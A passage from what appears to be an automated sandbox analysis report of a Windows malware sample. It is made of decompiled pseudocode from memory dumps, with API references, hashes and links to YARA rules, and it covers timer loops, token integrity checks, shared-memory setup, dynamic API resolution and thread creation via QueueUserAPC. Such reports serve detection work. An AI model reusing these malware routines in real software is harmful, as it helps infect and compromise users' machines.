				if(_t43 != 0) {
					_t71 =  *0x75d2e0; // 0x25ca5a8
					_t13 = _t71 + 0x75e885; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t46 = RtlAllocateHeap( *0x75d270, 0, 0x800); // executed
					_t100 = _t46;
					if(_t100 != 0) {
						E0075A811(GetTickCount());
						_t50 =  *0x75d364; // 0x2d295b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x75d364; // 0x2d295b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x75d364; // 0x2d295b0
						_t103 = E00751974(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x75c2ac);
							_push(_t103);
							_t62 = E007538CA();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E00752A4E(0xffffffffffffffff, _t100, _v28, _v24); // executed
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E007547D5();
								}
								HeapFree( *0x75d270, 0, _v44);
							}
							HeapFree( *0x75d270, 0, _t103);
						}
						RtlFreeHeap( *0x75d270, 0, _t100); // executed
					}
					HeapFree( *0x75d270, 0, _a24);
				}
				RtlFreeHeap( *0x75d270, 0, _t105); // executed
				return _a4;
			}

0x007544a4
0x007544a4
0x007544a4
0x007544a9
0x007544af
0x007544b9
0x007544bb
0x007544bb
0x007544c8
0x007544d3
0x007544d6
0x007544e1
0x007544e4
0x007544e9
0x007544ec
0x007544f1
0x007544f4
0x00754500
0x0075450d
0x0075450f
0x00754515
0x0075451a
0x00754525
0x00754527
0x0075452a
0x0075452c
0x00754531
0x00754535
0x00754537
0x0075453c
0x00754548
0x0075454a
0x00754556
0x00754558
0x00754558
0x00754563
0x00754567
0x00754569
0x0075456e
0x0075457a
0x0075457c
0x00754588
0x0075458a
0x0075458a
0x00754590
0x007545a3
0x007545a7
0x007545ae
0x007545b1
0x007545b6
0x007545c1
0x007545c3
0x007545c6
0x007545c6
0x007545c8
0x007545cf
0x007545d2
0x007545d7
0x007545e1
0x007545e3
0x007545eb
0x007545fe
0x00754604
0x00754608
0x00754614
0x00754619
0x00754622
0x00754633
0x00754637
0x00754640
0x00754646
0x00754653
0x00754660
0x00754666
0x00754672
0x00754678
0x00754679
0x0075467e
0x00754684
0x0075468a
0x00754691
0x00754698
0x0075469e
0x007546a5
0x007546a9
0x007546b4
0x007546b9
0x007546bf
0x007546c8
0x007546c8
0x007546d9
0x007546d9
0x007546e8
0x007546e8
0x007546f7
0x007546f7
0x00754709
0x00754709
0x00754718
0x00754729

APIs

GetTickCount.KERNEL32 ref: 007544BB
wsprintfA.USER32 ref: 00754508
wsprintfA.USER32 ref: 00754525
wsprintfA.USER32 ref: 00754548
HeapFree.KERNEL32(00000000,00000000), ref: 00754558
wsprintfA.USER32 ref: 0075457A
HeapFree.KERNEL32(00000000,00000000), ref: 0075458A
wsprintfA.USER32 ref: 007545C1
wsprintfA.USER32 ref: 007545E1
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 007545FE
GetTickCount.KERNEL32 ref: 0075460E
RtlEnterCriticalSection.NTDLL(02D29570), ref: 00754622
RtlLeaveCriticalSection.NTDLL(02D29570), ref: 00754640

Part of subcall function 00751974: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,00754653,?,02D295B0), ref: 0075199F
Part of subcall function 00751974: lstrlen.KERNEL32(?,?,?,00754653,?,02D295B0), ref: 007519A7
Part of subcall function 00751974: strcpy.NTDLL ref: 007519BE
Part of subcall function 00751974: lstrcat.KERNEL32(00000000,?), ref: 007519C9
Part of subcall function 00751974: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00754653,?,02D295B0), ref: 007519E6

StrTrimA.SHLWAPI(00000000,0075C2AC,?,02D295B0), ref: 00754672

Part of subcall function 007538CA: lstrlen.KERNEL32(02D29B10,00000000,00000000,74ECC740,0075467E,00000000), ref: 007538DA
Part of subcall function 007538CA: lstrlen.KERNEL32(?), ref: 007538E2
Part of subcall function 007538CA: lstrcpy.KERNEL32(00000000,02D29B10), ref: 007538F6
Part of subcall function 007538CA: lstrcat.KERNEL32(00000000,?), ref: 00753901

lstrcpy.KERNEL32(00000000,?), ref: 00754691
lstrcpy.KERNEL32(00000000,00000000), ref: 00754698
lstrcat.KERNEL32(00000000,?), ref: 007546A5
lstrcat.KERNEL32(00000000,00000000), ref: 007546A9
HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 007546D9
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 007546E8
RtlFreeHeap.NTDLL(00000000,00000000,?,02D295B0), ref: 007546F7
HeapFree.KERNEL32(00000000,00000000), ref: 00754709
RtlFreeHeap.NTDLL(00000000,?), ref: 00754718

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeavestrcpy
String ID:
API String ID: 3963266935-0
Opcode ID: c416e1550eaeec10c970939e4996e2b57f3e252a4af8828030ddd09e13e89af8
Instruction ID: 69246dfd42fb3cf0bca2b3ec967e9da07da50bc5982a0d2bde3e886047e98619
Opcode Fuzzy Hash: c416e1550eaeec10c970939e4996e2b57f3e252a4af8828030ddd09e13e89af8
Instruction Fuzzy Hash: FA619071500300EFC7319B64DC49FDA37A8FB48356F054514F909D31A1E6ADED4ACB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00755461, Relevance: 16.6, APIs: 11, Instructions: 150
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00755461(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x75d278);
					_v20 = 0;
					_v16 = 0;
					L0075AED0();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x75d2a4; // 0x214
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x75d284 = 5;
						} else {
							_t68 = E0075502E(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x75d298 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E0075577D(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16);
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E00752107(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x75d27c);
							goto L21;
						} else {
							__eflags =  *0x75d280; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E007547D5();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x75d280);
								L21:
								L0075AED0();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x75d270, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x00755461
0x00755473
0x00755476
0x00755482
0x00755488
0x0075548d
0x007555f4
0x00755493
0x00755493
0x00755495
0x0075549a
0x0075549b
0x007554a1
0x007554a4
0x007554a7
0x007554b5
0x007554c0
0x007554c3
0x007554c5
0x007554d2
0x007554dc
0x007554de
0x007554e3
0x007554e8
0x007554f3
0x007554f3
0x007554ea
0x007554ea
0x007554f1
0x00000000
0x00000000
0x007554f1
0x007554fd
0x00000000
0x00755500
0x00755504
0x0075550f
0x0075550f
0x00755516
0x0075551f
0x00755526
0x0075552f
0x00755532
0x00755535
0x0075553a
0x0075553f
0x00000000
0x00000000
0x00755541
0x00755544
0x00755547
0x0075554a
0x00000000
0x0075554c
0x0075555b
0x0075555b
0x00000000
0x00755589
0x00755589
0x0075558e
0x007555ad
0x007555af
0x007555b4
0x007555b5
0x00000000
0x00755590
0x00755590
0x00755596
0x00000000
0x00755598
0x00755598
0x0075559d
0x0075559f
0x007555a4
0x007555a5
0x007555bb
0x007555bb
0x007555c3
0x007555ce
0x007555d1
0x007555dc
0x007555de
0x007555e1
0x007555e3
0x00000000
0x007555e9
0x00000000
0x007555e9
0x007555e3
0x00755596
0x00000000
0x0075558e
0x0075555e
0x00755560
0x00755563
0x00755564
0x00755564
0x00755568
0x00755572
0x00755572
0x00755578
0x0075557b
0x0075557b
0x00755581
0x00755581
0x007555fe
0x00000000

APIs

memset.NTDLL ref: 00755476
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00755482
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 007554A7
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 007554C3
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 007554DC
HeapFree.KERNEL32(00000000,00000000), ref: 00755572
CloseHandle.KERNEL32(?), ref: 00755581
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 007555BB
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,007553C9,?), ref: 007555D1
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 007555DC

Part of subcall function 0075502E: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,02D29370,00000000,?,7519F710,00000000,7519F730), ref: 0075507D
Part of subcall function 0075502E: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,02D293A8,?,00000000,30314549,00000014,004F0053,02D29364), ref: 0075511A
Part of subcall function 0075502E: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,007554EF), ref: 0075512C

GetLastError.KERNEL32 ref: 007555EE

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: facfbc17b773d6ad81117b41cffbbb663757128e298216be5de7141a4f64e3ce
Instruction ID: a836cbe2775137ad882ffd0c4c04892c0331b83f0c4774bdec6e6be3630d02b4
Opcode Fuzzy Hash: facfbc17b773d6ad81117b41cffbbb663757128e298216be5de7141a4f64e3ce
Instruction Fuzzy Hash: 86515171801228EFDF219F94DC449EEBFBAFF09722F104115F815E2190E7B89A58CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00753598, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00753598(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L0075AECA();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x75d2e0; // 0x25ca5a8
				_t5 = _t13 + 0x75e876; // 0x2d28e1e
				_t6 = _t13 + 0x75e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L0075ABEA();
				_t17 = CreateFileMappingW(0xffffffff, 0x75d2e4, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x00753598
0x007535a0
0x007535a4
0x007535aa
0x007535af
0x007535b4
0x007535b7
0x007535ba
0x007535bf
0x007535c0
0x007535c3
0x007535c8
0x007535cf
0x007535d9
0x007535db
0x007535dc
0x007535df
0x007535fb
0x00753601
0x00753605
0x00753653
0x00753607
0x00753614
0x00753624
0x0075362c
0x0075363e
0x00753642
0x00000000
0x00000000
0x0075362e
0x00753631
0x00753636
0x00753638
0x00753638
0x00753616
0x00753618
0x00753644
0x00753645
0x00753645
0x00753614
0x0075365a

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,0075529C,?,?,4D283A53,?,?), ref: 007535A4
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 007535BA
_snwprintf.NTDLL ref: 007535DF
CreateFileMappingW.KERNELBASE(000000FF,0075D2E4,00000004,00000000,00001000,?), ref: 007535FB
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0075529C,?,?,4D283A53), ref: 0075360D
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00753624
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,0075529C,?,?), ref: 00753645
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0075529C,?,?,4D283A53), ref: 0075364D

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: ad95349c0024903369b0c4acd2f51fea09ba4b3702f508b9febf73ae9f9e79ed
Instruction ID: 551710eba125ff1e3dabd274536babaef36cbd55aa27101bb75e5b0ef078fadd
Opcode Fuzzy Hash: ad95349c0024903369b0c4acd2f51fea09ba4b3702f508b9febf73ae9f9e79ed
Instruction Fuzzy Hash: DA21C372A00304FFD7219B64DC09FDE37A9EB44746F204129FA0AE72E0D6F89A09CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00754151, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00754151(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x75d294 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E007575F6(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E00754AAB(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x0075415e
0x00754165
0x0075416c
0x00754180
0x0075418b
0x007541a3
0x007541b0
0x007541b3
0x007541b8
0x007541c3
0x007541c7
0x007541d6
0x007541da
0x007541f6
0x007541f6
0x007541fa
0x007541fa
0x007541ff
0x00754203
0x00754209
0x0075420a
0x00754211
0x00754217

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00754183
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 007541A3
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 007541B3
CloseHandle.KERNEL32(00000000), ref: 00754203

Part of subcall function 007575F6: RtlAllocateHeap.NTDLL(00000000,00000000,00754F70), ref: 00757602

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 007541D6
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 007541DE
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 007541EE

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 534a90815728ce1d59e80ed753c0587d348e3305c9a1a0a7a979503f36d0a4ac
Instruction ID: c079dbcbd56873c90e0810a7cc39af1c21dd330022983d15cb2c72047bc90801
Opcode Fuzzy Hash: 534a90815728ce1d59e80ed753c0587d348e3305c9a1a0a7a979503f36d0a4ac
Instruction Fuzzy Hash: F521607590021DFFEB119F94DC44EEEBBB9FB04305F004065F910A21A1D7B58E85DB64

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE19C2, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECE19C2(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6ECE1000(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6ece41c4 + 0x6ece5014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6ece41c4 + 0x6ece5151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6ECE1397(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6ece41c4 + 0x6ece5161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6ece41c4 + 0x6ece5174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6ece41c4 + 0x6ece5189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6ece41c4 + 0x6ece519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6ECE13B8(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x6ece19d0
0x6ece19d4
0x6ece1a95
0x6ece19da
0x6ece19f2
0x6ece1a01
0x6ece1a08
0x6ece1a0a
0x6ece1a0f
0x6ece1a8d
0x6ece1a8e
0x6ece1a11
0x6ece1a1e
0x6ece1a20
0x6ece1a25
0x00000000
0x6ece1a27
0x6ece1a34
0x6ece1a36
0x6ece1a3b
0x00000000
0x6ece1a3d
0x6ece1a4a
0x6ece1a4c
0x6ece1a51
0x00000000
0x6ece1a53
0x6ece1a60
0x6ece1a62
0x6ece1a67
0x00000000
0x6ece1a69
0x6ece1a6f
0x6ece1a75
0x6ece1a7a
0x6ece1a7f
0x6ece1a84
0x00000000
0x6ece1a86
0x6ece1a89
0x6ece1a89
0x6ece1a84
0x6ece1a67
0x6ece1a51
0x6ece1a3b
0x6ece1a25
0x6ece1a0f
0x6ece1aa3

APIs

Part of subcall function 6ECE1000: HeapAlloc.KERNEL32(00000000,?,6ECE15ED,00000030,751463F0,00000000), ref: 6ECE100C

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6ECE1051,?,?,?,?), ref: 6ECE19E6
GetProcAddress.KERNEL32(00000000,?), ref: 6ECE1A08
GetProcAddress.KERNEL32(00000000,?), ref: 6ECE1A1E
GetProcAddress.KERNEL32(00000000,?), ref: 6ECE1A34
GetProcAddress.KERNEL32(00000000,?), ref: 6ECE1A4A
GetProcAddress.KERNEL32(00000000,?), ref: 6ECE1A60

Part of subcall function 6ECE13B8: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000), ref: 6ECE1415
Part of subcall function 6ECE13B8: memset.NTDLL ref: 6ECE1437

Memory Dump Source

Source File: 00000000.00000002.644187426.000000006ECE1000.00000020.00020000.sdmp, Offset: 6ECE0000, based on PE: true

Associated: 00000000.00000002.644138464.000000006ECE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.644226108.000000006ECE3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.644252899.000000006ECE5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.644278695.000000006ECE6000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: e165706019bddfc3033dfa41c9788b0fe6ca7f53c65baa3177b68eba0e534ae6
Instruction ID: 35e36b7706ba61a065bb6b89b6a48eeca0df9fd8e6d2fa0cbdec0e261e4fa780
Opcode Fuzzy Hash: e165706019bddfc3033dfa41c9788b0fe6ca7f53c65baa3177b68eba0e534ae6
Instruction Fuzzy Hash: 4A215AB1600B0BAFDB10DFAEC984D6AB7FCEF453007004566F455E7651E774E9198BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE1B59, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6ece4188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6ece418c;
						if( *0x6ece418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6ece4198;
								if( *0x6ece4198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6ece418c);
						}
						HeapDestroy( *0x6ece4190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6ece4188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						 *0x6ece4190 = _t18;
						_t41 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6ece41b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6ECE153C(E6ECE1719, E6ECE1C35(_a12, 1, 0x6ece4198, _t41));
							 *0x6ece418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x6ece1b5c
0x6ece1b68
0x6ece1b6a
0x6ece1b6d
0x6ece1be3
0x6ece1be9
0x6ece1beb
0x6ece1bed
0x6ece1bf3
0x6ece1bf5
0x6ece1bfa
0x6ece1bfd
0x6ece1c08
0x6ece1c0a
0x00000000
0x00000000
0x6ece1c0c
0x6ece1c0f
0x6ece1c11
0x00000000
0x00000000
0x00000000
0x6ece1c11
0x6ece1c19
0x6ece1c19
0x6ece1c25
0x6ece1c25
0x6ece1b6f
0x6ece1b70
0x6ece1b90
0x6ece1b96
0x6ece1b9b
0x6ece1b9d
0x6ece1bd9
0x6ece1bd9
0x6ece1b9f
0x6ece1ba7
0x6ece1bae
0x6ece1bb8
0x6ece1bc4
0x6ece1bc9
0x6ece1bd0
0x6ece1bd5
0x00000000
0x6ece1bd5
0x6ece1bd0
0x6ece1b9d
0x6ece1b70
0x6ece1c32

APIs

InterlockedIncrement.KERNEL32(6ECE4188), ref: 6ECE1B7B
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6ECE1B90

Part of subcall function 6ECE153C: CreateThread.KERNELBASE ref: 6ECE1553
Part of subcall function 6ECE153C: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6ECE1568
Part of subcall function 6ECE153C: GetLastError.KERNEL32(00000000), ref: 6ECE1573
Part of subcall function 6ECE153C: TerminateThread.KERNEL32(00000000,00000000), ref: 6ECE157D
Part of subcall function 6ECE153C: CloseHandle.KERNEL32(00000000), ref: 6ECE1584
Part of subcall function 6ECE153C: SetLastError.KERNEL32(00000000), ref: 6ECE158D

InterlockedDecrement.KERNEL32(6ECE4188), ref: 6ECE1BE3
SleepEx.KERNEL32(00000064,00000001), ref: 6ECE1BFD
CloseHandle.KERNEL32 ref: 6ECE1C19
HeapDestroy.KERNEL32 ref: 6ECE1C25

Memory Dump Source

Source File: 00000000.00000002.644187426.000000006ECE1000.00000020.00020000.sdmp, Offset: 6ECE0000, based on PE: true

Associated: 00000000.00000002.644138464.000000006ECE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.644226108.000000006ECE3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.644252899.000000006ECE5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.644278695.000000006ECE6000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: 514310d0cfeb2dd167f25c6043a2c42abe0906b3c7306c1fa5d51856091dc697
Instruction ID: 87352cedd6c39fa990c9b222cc536e803773813cd1a1d21ad70ea66f4697a905
Opcode Fuzzy Hash: 514310d0cfeb2dd167f25c6043a2c42abe0906b3c7306c1fa5d51856091dc697
Instruction Fuzzy Hash: 1C21AF71A00A15EFCF40AFEDCE89A997BBCFB5A3607000829F616D7644F734991ACB50

Uniqueness

Uniqueness Score: -1.00%

Function 0075262F, Relevance: 9.1, APIs: 6, Instructions: 61
sleepmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0075262F(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t27;
				signed int _t34;

				_t27 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x75d270 = _t10;
				if(_t10 != 0) {
